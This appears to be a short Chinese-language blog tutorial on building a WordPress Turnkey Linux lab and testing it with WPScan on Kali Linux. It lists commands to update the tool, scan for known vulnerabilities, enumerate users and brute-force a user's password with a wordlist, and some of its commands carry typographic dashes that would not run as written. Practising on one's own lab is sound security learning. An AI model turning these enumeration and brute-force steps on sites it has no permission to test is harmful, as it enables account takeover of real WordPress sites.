第一步——获取WordPress应用程序
怎么获取WordPress的具体操作在这里不仔细叙述,网上百度就有
第二部——安装WordPress Turnkey Linux
下载好ISO文件之后进行安装WordPress Turnkey Linux的安装
这里也不仔细叙述,比较简单
第三步——安装完毕并设置好
可以看到WordPress应用服务的详细信息,如Web地址、Web shell地址等,如图
第四步——攻击
我们利用KALI LINUX下的一个WPScan来攻击,WPScan是一个黑盒安全扫描器,它允许用户查找Word Press安装板的一些已知的安全漏洞。
使用以下命令更新漏洞库:
wpscan -update
接下来使用下面的命令来扫描可能存在的漏洞网站:
wpscan –url [wordpress url]
使用下面的命令来进行枚举:
wpscan –url [wordpress url] –enumerate u
使用下面的命令来暴力破解用户的root密码:
wpscan –url [wordpress url] –wordlist [path to wordlist] –username [username to brute force] –threads [number of threads to use]
需要注意的是WPScan一开始需要与database监理链接,这个直接update就好,第二各地方是在破解时需要制定一个字典文件并置于/root/下